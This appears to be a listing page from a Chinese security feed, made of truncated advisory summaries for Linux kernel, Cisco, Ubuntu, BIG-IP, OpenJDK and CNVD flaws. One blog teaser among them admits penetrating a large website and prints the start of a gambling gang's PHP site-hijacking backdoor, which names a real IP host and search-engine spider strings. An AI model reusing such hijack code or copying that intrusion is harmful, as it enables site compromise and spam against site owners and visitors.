漏洞类别：RedHat 漏洞等级： 漏洞信息 The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. This update upgrades Flash Player to version 11.2.202.643. Security Fix(es): * This update fixes one vulnerability in Adobe Flash Play…

漏洞类别：RedHat 漏洞等级： 漏洞信息 The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es): * A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-…

漏洞类别：RedHat 漏洞等级： 漏洞信息 The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Security Fix(es): * A race condition was found in the way the Linux kernel's memory subsystem …

漏洞类别：RedHat 漏洞等级： 漏洞信息 The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Security Fix(es): * A race condition was found in the way the Linux kernel's memory subsystem …

漏洞类别：OEL 漏洞等级： 漏洞信息 Oracle Enterprise Linux has released security update for kernel to fix the vulnerabilities. Affected Products: Oracle Linux 5 漏洞危害 An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings a…

漏洞类别：RedHat 漏洞等级： 漏洞信息 The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es): * A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-…

漏洞类别：RedHat 漏洞等级： 漏洞信息 The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es): * A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-…

漏洞类别：Ubuntu 漏洞等级： 漏洞信息 It was discovered that the nginx package incorrectly handled log file permissions. 漏洞危害 A remote attacker could possibly use this issue to obtain root privileges. 解决方案 Refer to Ubuntu advisory USN-3114-1 for affected packages and patchin…

漏洞类别：Ubuntu 漏洞等级： 漏洞信息 It was discovered that Quagga incorrectly handled certain IPv6 router advertisements. 漏洞危害 A remote attacker could possibly use this issue to cause Quagga to crash, resulting in a denial of service. 解决方案 Refer to Ubuntu advisory USN-3110…

漏洞类别：General remote services 漏洞等级： 漏洞信息 A vulnerability in the command-line interface (CLI) processor of the Cisco Wireless LAN Controller (WLC) could allow an authenticated, local attacker to inject arbitrary commands that are executed with elevated privilege…

漏洞类别：General remote services 漏洞等级： 漏洞信息 A vulnerability in the web authentication feature of Cisco Wireless LAN Controller (WLC) could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition. The vulnerability is due to the imp…

漏洞类别：Cisco 漏洞等级： 漏洞信息 A vulnerability in the handling of incoming Layer 2 packets tagged with a Cisco Nexus 9000 Series Switch (N9K) reserved VLAN number could allow an unauthenticated, adjacent attacker to cause a partial denial of service (DoS) condition due…

漏洞类别：Cisco 漏洞等级： 漏洞信息 A vulnerability in the Command Line Interface (CLI) parser of Cisco Nexus Operating System (NX-OS) devices could allow an authenticated, local attacker to perform a privilege escalation. The vulnerability is due to improper input validati…

漏洞类别：Cisco 漏洞等级： 漏洞信息 A vulnerability in RADIUS functions of Cisco IOS Software and Cisco IOS XE Software could allow an authenticated, remote attacker to cause the Cisco IOS device to reload. The vulnerability is due to incorrect processing of RADIUS Accept p…

漏洞类别：Cisco 漏洞等级： 漏洞信息 A vulnerability in Internet Key Exchange version 1 code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to bypass Extended Authentication and successfully log in via IPsec remote VPN. The …

漏洞类别：General remote services 漏洞等级： 漏洞信息 A vulnerability in Cisco TelePresence Collaboration Desk and Room Endpoints running TC Software could allow an unauthenticated, remote attacker to conduct HTTP response splitting attacks. The vulnerability is due to insu…

漏洞类别：Local 漏洞等级： 漏洞信息 A denial of service flaw was found in the way the SSL/TLS protocol, defined processing of ALERT packets during an SSL handshake. An attacker could use this flaw to DoS servers compiled against cryptographic libraries, which do not allocat…

漏洞类别：Local 漏洞等级： 漏洞信息 BIG-IP virtual servers with a configuration using the HTTP Explicit Proxy functionality and/or SOCKS profile are vulnerable to an unauthenticated, remote attack that allows modification of BIG-IP system configuration, extraction of sensit…

起因 对这件事情的起因是某天我渗透了一个大站，第二天进webshell时就发现，当前目录出现了新的后门，仔细一查，发现是博彩团伙干的，网站被全局劫持黑帽程序如下代码 set_time_limit(20);error_reporting(0); define('u_b','/'); define('s_u','http:// 107.182.228.74/'); define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|youdao@i…

漏洞类别：Local 漏洞等级： 漏洞信息 BIG-IP virtual servers with a configuration using the HTTP Explicit Proxy functionality and/or SOCKS profile are vulnerable to an unauthenticated, remote attack that allows modification of BIG-IP system configuration, extraction of sensit…

漏洞类别：Local 漏洞等级： 漏洞信息 Cisco AnyConnect is a VPN Client for multiple platforms. The Cisco AnyConnect Secure Mobility Client is affected by the following vulnerabilities: - The vulnerability is due to insufficient path traversal protections in certain IPC comman…

漏洞类别：Amazon Linux 漏洞等级： 漏洞信息 It was discovered that python-twisted-web used the value of the Proxy header from HTTP requests to initialize the HTTP_PROXY environment variable for CGI scripts, which in turn was incorrectly used by certain HTTP client implementa…

漏洞类别：Amazon Linux 漏洞等级： 漏洞信息 It was discovered that the Hotspot component of OpenJDK did not properly check arguments of the System.arraycopy() function in certain cases. An untrusted Java application or applet could use this flaw to corrupt virtual machine's …

报送者:光刃[天融信] CNVD-ID CNVD-2016-10177 发布时间 2016-10-22 危害级别 中 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 影响产品 珠海市优道信息科技有限公司 优道文档阅读器 2.5.1 漏洞描述 优道文档阅读器是一款具备防截图功能的信息安全阅读器产品，用来查看被优道文档保护器加密的文本、图片、PDF、XPS、金山WPS、Office文档等，加密后的文件扩展名为.drm。 优道文档阅读器在处理自定义的DRM格式文件存在内存破坏漏洞，允许攻击者利用该漏洞构造畸形的…

报送者:miss CNVD-ID CNVD-2016-10176 发布时间 2016-10-24 危害级别 中 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 影响产品 TRS TRS Portal个性化门户 漏洞描述 TRS Portal为拓尔思公司开发的一套完全基于J2EE和浏览器技术的个性化门户通用型软件。 TRS Portal个性化门户AppletHttpUploadServlet Servlet无需登录即可访问，允许攻击者可以利用漏洞遍历所有目录文件、删除任意目录文件。 参考链接 漏洞解决方案 …